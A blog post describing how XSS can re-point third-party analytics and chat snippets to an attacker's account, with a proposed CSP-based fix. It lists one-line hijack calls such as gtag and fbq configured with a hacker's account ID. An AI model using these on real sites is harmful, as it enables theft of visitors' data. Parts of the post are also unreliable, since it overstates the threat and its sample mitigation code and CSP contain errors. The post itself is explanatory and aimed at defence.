All data collection platforms, e.g., Google Analytics, Meta, Intercom, Segment, and Fullstory, opened breaches on all websites

Posted Aug 21, 2023

(Internet Security)

If your website uses a data platform, it is open to data breaches, and your customers' data is insecure.

This is an old issue, and I am surprised no one takes this seriously.
This article explains that data platforms exploit all customer-facing websites and suggests a solution.

Today 98.7% of websites use JavaScript, and almost all, without exception, use data collection platforms for analytics, advertising, customer experience, communications, payments, support, error monitoring, and more. All those platforms provide a snippet of code required to be added to the customer-facing website. Website owners have learned to isolate incoming and outcoming traffic risks by using Content Security Policy, allowing domains per various usages, e.g., to enable data reporting only to Google Analytics domains. It turns out this doesn't stop the platforms from being hijacked, leaks data to hackers, and allows hackers to interact on your behalf. All this is done undetectable, without fingerprints, and with a single line of code.

Few exploit examples

Hijacked Intercom allows hackers to impersonate you and your company and chat with your customers on your behalf.
Hijacked Google Analytics sends sensitive data to hackers' accounts.
Hijacked Hotjar and Fullstory send website session recordings to hackers' accounts.
Hijacked Segment overtakes all data flow to the hackers' accounts.

Unstoppable hijack; security is an illusion

This exploit is unstoppable and untraceable in current technology. This is due to the data platform's current design and the high risks of Cross-Site Scripting (XSS) on all websites.

Data platforms are widely used and open for everyone, used on almost every website. Website owners are fooled into thinking strict Content Security Policy (CSP) would stop websites from being hacked. In reality, hackers can unnoticeably leak data and compromise websites under the exact domains. Even if platforms would require a domain allowlist in their settings, hackers can use the same settings and still be able to target any website.

XSS exploits are a threat to Web

Browsers and Web standards don't have complete XSS isolation and recommend using CSP, which cannot stop the data platform hijacking.
80.2% of websites use JavaScript libraries and frameworks and tons of npm packages, making a 100% guarantee of XSS isolation impossible, opening new security holes among websites, and allowing hackers to inject and execute harmful JavaScript.
Customers using browser extensions turn websites vulnerable, allowing extensions to inject and execute code and modify the content of the websites without noticing it.
ISPs, DNSs, and proxies, including Antivirus software, inject JavaScript and change website content without notice.

How data collection platforms work

The visited website executes a snippet given from the data platform.
The website loads the platform's external script and initializes it to the snippet configuration.
The platform gets associated with the account/s defined in the snippet.
The platform collects the data on its servers associated with specified account/s.

The data platforms hijack; the part where it gets hacked

XSS reassociates platform accounts to hackers' accounts.
The platform collects and sends data to hackers' accounts.
XSS allows hackers to customize collected data and leak sensitive data.

Few single-line code examples for data platforms hijack

Google Tag gtag("config", hackerAccountId)
Meta Pixel fbq("init", hackerAccountId)
Intercom Intercom("boot", {app_id: hackerAccountId})
Hotjar Hotjar.init(hackerAccountId, 6)
Fullstory FS.identify(hackerAccountId)
Segment analytics.load(hackerAccountId)

Unless new technology standards are involved and data platforms are redesigned, there is not much we can do to stop this.

Safe data platforms proposal

Here is a proposal for safe data platforms isolating from the data platforms hijacks able to exploit websites' sensitive data.

The data platforms hijack can be isolated using CSP existing Web standards by defining the platform account in the script link and not in a code. Here the requirements

Platforms should be designed without the requirement of CSP 'unsafe-inline' and 'unsafe-hashes' to minimize the high risks of XSS.
Define the data platforms account in the script link, e.g., https://platform.com/script.js?accountId=ACCOUNT_ID, and NOT defined in the code.
- Platforms would read the accountId using document.currentScript or import.meta.url in the JavaScript module.
```
const scriptURL = document?.currentScript || import.meta.url;
const accountId = (new URLSearchParams(scriptURL)).get("accountId");
```
- Guide developers to use the CSP header with the absolute link having an accountId script-src: https://platform.com/script.js?accountId=ACCOUNT_ID.
- (Optional) Allow defining multiple accounts with comma separator https://platform.com/script.js?accountId=ACCOUNT_ID,ACCOUNT_ID2.
(Optional; extra security) Collect the data under the account-associated link https://platform.com/report/ACCOUNT_ID.
(Optional; extra security) Do not expose the platform script to a globally accessible 'window'; load it in the JavaScript module.

Guide and validate developers to have a correct CSP header (do not use CSP in HTML meta tag because it is overwritable).

Content-Security-Policy: default-src 'none';
    script-src: 'self' 'unsafe-inline' https://platform.com/script.js?accountId=ACCOUNT_ID;
    connect-src https://platform.com/beacon/ACCOUNT_ID;

This CSP policy with a link having an accountId would disable account reassociation and prevent data from being collected under the wrong account.

Regarding Web standards, the proposal is to introduce total "illegal" JavaScript execution elimination, either executed by browser extension (not a code injection but code execution, including headers, e.g., CSP rewrite) or in developer tools. Knowing that adding new Web standards takes many years, this is less likely to happen now.
Operating Systems, DNS resolvers, and browsers could identify and prevent IPS, DNS, and proxies from manipulating website responses. Somebody should address Web standards and Internet laws on how Internet resources should be filtered or blocked and how it will affect the interface).

I have brainstormed about more workarounds, e.g., ownership verification in DNS. Still, the one mentioned above would be boolean-proof.

Advice to website owners

Train developers to understand how the Web works, and know the security risks and the value of failures in your business. Research your third-party services and code, their requirements, risks, and policies. Regarding the platform hijack, raise your concerns to your platform support to cover all security issues or reconsider whether using AS IS is worth the risks.
Website developers can look for ways to monitor account reassociation, and when the hijack happens, block the website access or immediately reassociate back to the origin account. Feel free to brainstorm and propose a safer Web.